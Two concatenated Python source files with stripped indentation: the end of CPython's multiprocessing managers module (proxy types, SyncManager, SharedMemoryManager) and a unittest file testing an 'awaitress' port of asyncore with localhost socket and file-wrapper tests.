server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
util.debug('Rebuild a proxy owned by manager, token=%r', token)
kwds['manager_owned'] = True
if token.id not in server.id_to_local_proxy_obj:
server.id_to_local_proxy_obj[token.id] = \
server.id_to_obj[token.id]
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, /, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
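# For example, MakeProxyType('FooProxy', ('bar',)) builds a BaseProxy subclass
# whose bar(*args, **kwds) simply returns self._callmethod('bar', args, kwds),
# and caches it under the key ('FooProxy', ('bar',)).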
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True, manager_owned=False):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref, manager_owned=manager_owned)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, /, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = time.monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - time.monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
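# Typical use (sketch): multiprocessing.Manager() returns a started SyncManager
# whose factory methods hand out proxies to objects living in the server process.
#
#   from multiprocessing import Manager
#   with Manager() as manager:
#       shared = manager.dict()
#       lock = manager.Lock()
#       shared['answer'] = 42      # forwarded to the server via DictProxy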
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
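        # Usage sketch: blocks created through the manager are unlink()ed
        # automatically when the manager shuts down.
        #
        #   with SharedMemoryManager() as smm:
        #       shm = smm.SharedMemory(size=128)
        #       numbers = smm.ShareableList([1, 2, 3])
        #       ...  # both segments are released on exit from the with-block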
|
test_wasyncore.py
|
from awaitress import wasyncore as asyncore
from awaitress import compat
import contextlib
import functools
import gc
import unittest
import select
import os
import socket
import sys
import time
import errno
import re
import struct
import threading
import warnings
from io import BytesIO
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == "java": # pragma: no cover
# Jython disallows @ in module names
TESTFN = "$test"
else:
TESTFN = "@test"
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger(object): # pragma: no cover
def __init__(self):
self.messages = []
def log(self, severity, message):
self.messages.append((severity, message))
class WarningsRecorder(object): # pragma: no cover
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
@property
def warnings(self):
return self._warnings[self._last :]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False): # pragma: no cover
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get("__warningregistry__")
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swaps the module, we need to look it up in
# the sys.modules dictionary.
sys.modules["warnings"].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if re.match(msg, str(warning), re.I) and issubclass(warning.__class__, cat):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" % missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs): # pragma: no cover
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get("quiet")
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
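# Illustrative usage sketch (hypothetical helper, not part of the original
# test module): check_warnings() records warnings raised in its body and, for
# each ("message regexp", WarningCategory) filter given, asserts that at least
# one recorded warning matched; unexpected warnings are re-raised.
def _example_check_warnings():  # pragma: no cover
    with check_warnings(("deprecated", DeprecationWarning), quiet=False):
        warnings.warn("deprecated API", DeprecationWarning)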
def gc_collect(): # pragma: no cover
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if sys.platform.startswith("java"):
time.sleep(0.1)
gc.collect()
gc.collect()
def threading_setup(): # pragma: no cover
return (compat.thread._count(), None)
def threading_cleanup(*original_values): # pragma: no cover
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = (compat.thread._count(), None)
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
sys.stderr.write(
"Warning -- threading_cleanup() failed to cleanup "
"%s threads" % (values[0] - original_values[0])
)
sys.stderr.flush()
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func): # pragma: no cover
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
def join_thread(thread, timeout=30.0): # pragma: no cover
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = "failed to join the thread in %.1f seconds" % timeout
raise AssertionError(msg)
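# Illustrative usage sketch (hypothetical test, not part of the original
# module): reap_threads() wraps a callable so threading_cleanup() runs even if
# the body raises, and join_thread() fails the test if the thread outlives the
# timeout.
@reap_threads
def _example_reap_threads():  # pragma: no cover
    t = threading.Thread(target=lambda: time.sleep(0.01))
    t.start()
    join_thread(t, timeout=TIMEOUT)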
def bind_port(sock, host=HOST): # pragma: no cover
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, "SO_REUSEADDR"):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEADDR "
"socket option on TCP/IP sockets!"
)
if hasattr(socket, "SO_REUSEPORT"):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEPORT "
"socket option on TCP/IP sockets!"
)
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
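# Illustrative usage sketch (hypothetical helper, not part of the original
# module): bind_port() binds the socket to an ephemeral port on HOST and
# returns the chosen port number, so concurrent test runs never collide on a
# fixed port.
def _example_bind_port():  # pragma: no cover
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        port = bind_port(s)   # bound to (HOST, <ephemeral port>)
        s.listen(1)
        return port
    finally:
        s.close()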
@contextlib.contextmanager
def closewrapper(sock): # pragma: no cover
try:
yield sock
finally:
sock.close()
class dummysocket: # pragma: no cover
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
def setblocking(self, yesno):
self.isblocking = yesno
def getpeername(self):
return "peername"
class dummychannel: # pragma: no cover
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy: # pragma: no cover
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv): # pragma: no cover
try:
serv.listen(0)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b"\n", b""))
if b"\n" in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_unix_socket(sock, addr): # pragma: no cover
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest("cannot bind AF_UNIX sockets")
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
bind_unix_socket(sock, addr)
else:
sock.bind(addr)
if sys.platform.startswith("win"): # pragma: no cover
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or "."
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an i7@4.3GHz shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn(
"tests may fail, delete still pending for " + pathname,
RuntimeWarning,
stacklevel=4,
)
def _unlink(filename):
_waitfor(os.unlink, filename)
else:
_unlink = os.unlink
def unlink(filename):
try:
_unlink(filename)
except OSError:
pass
def _is_ipv6_enabled(): # pragma: no cover
"""Check whether IPv6 is enabled on this host."""
if compat.HAS_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(("::1", 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ("read", "expt", "write", "closed", "error_handled")
expected = (
(select.POLLIN, "read"),
(select.POLLPRI, "expt"),
(select.POLLOUT, "write"),
(select.POLLERR, "closed"),
(select.POLLHUP, "closed"),
(select.POLLNVAL, "closed"),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
# def handle_error(self):
# self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr == expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], "test_wasyncore.py")
self.assertEqual(function, "test_compact_traceback")
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, "[%s|%s|%s]" % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), "<awaitress.wasyncore.dispatcher at %#x>" % id(d))
def test_log_info(self):
import logging
inst = asyncore.dispatcher(map={})
logger = DummyLogger()
inst.logger = logger
inst.log_info("message", "warning")
self.assertEqual(logger.messages, [(logging.WARN, "message")])
def test_log(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.log("message")
self.assertEqual(logger.messages, [(logging.DEBUG, "message")])
def test_unhandled(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.handle_expt()
inst.handle_read()
inst.handle_write()
inst.handle_connect()
expected = [
(logging.WARN, "unhandled incoming priority event"),
(logging.WARN, "unhandled read event"),
(logging.WARN, "unhandled write event"),
(logging.WARN, "unhandled connect event"),
]
self.assertEqual(logger.messages, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, "strerror"):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send): # pragma: no cover
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b"\n")
n = 1000
while d.out_buffer and n > 0: # pragma: no cover
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data * 2)
finally:
join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(
hasattr(asyncore, "file_wrapper"), "asyncore.file_wrapper required"
)
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, "wb") as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, "rb") as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(
hasattr(asyncore, "file_dispatcher"), "asyncore.file_dispatcher required"
)
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
got_warning = False
while got_warning is False:
# we try until we get the outcome we want because this test is not
# deterministic (gc_collect() may not trigger the ResourceWarning on every pass)
# test is not deterministic (gc_collect() may not
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
try:
with check_warnings(("", compat.ResourceWarning)):
f = None
gc_collect()
except AssertionError: # pragma: no cover
pass
else:
got_warning = True
def test_close_twice(self):
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher): # pragma: no cover
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
